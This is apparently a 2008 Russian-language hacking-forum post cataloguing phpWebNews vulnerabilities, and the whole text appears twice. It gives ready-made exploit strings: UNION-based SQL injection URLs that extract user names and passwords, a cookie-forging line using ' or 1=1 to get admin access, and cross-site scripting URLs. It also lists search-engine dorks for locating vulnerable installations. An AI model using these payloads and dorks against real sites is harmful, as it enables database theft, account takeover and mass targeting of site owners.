~!DoK_tOR!~
26.07.2008, 23:28
[ Обзор уязвимостей phpWebNews ]
phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
Воздействие:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Exploit:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
Exploit:
http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,con cat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+use r--
phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vulnerability
Exploit:
javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;";
phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites
Exploit:
www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>
www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script>
www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script>
Dork:
Powered by PHPWebNews
Powered by PHPWebNews v1.0
Powered by PHPWebNews v2.0
allinurl:index.php?id_kat=
Download phpWebNews:
phpwebnews-mysql 0.2 (http://sourceforge.net/project/showfiles.php?group_id=111998&package_id=121419&release_id=246661)
phpwebnews-posgresql 0.1 (http://sourceforge.net/project/showfiles.php?group_id=111998&package_id=121420&release_id=246665)
phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
Воздействие:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Exploit:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
Exploit:
http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,con cat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+use r--
phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vulnerability
Exploit:
javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;";
phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites
Exploit:
www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>
www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script>
www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script>
Dork:
Powered by PHPWebNews
Powered by PHPWebNews v1.0
Powered by PHPWebNews v2.0
allinurl:index.php?id_kat=
Download phpWebNews:
phpwebnews-mysql 0.2 (http://sourceforge.net/project/showfiles.php?group_id=111998&package_id=121419&release_id=246661)
phpwebnews-posgresql 0.1 (http://sourceforge.net/project/showfiles.php?group_id=111998&package_id=121420&release_id=246665)